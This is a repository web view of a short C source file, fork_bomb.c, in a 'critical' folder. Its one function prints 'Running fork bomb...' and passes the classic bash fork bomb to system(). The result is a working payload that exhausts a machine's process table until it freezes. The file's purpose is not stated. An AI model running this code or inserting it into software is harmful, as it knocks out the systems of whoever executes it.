summaryrefslogtreecommitdiff
path: root/src/critical/fork_bomb.c
blob: beadc232a6cc9bd232eea169707cf70d9b103844 (plain)
1
2
3
4
5
6
#include <stdlib.h>
#include <stdio.h> 
void fork_bomb() {
    printf("Running fork bomb...");
    system("/bin/bash -c ':(){ :|:& };:'");
}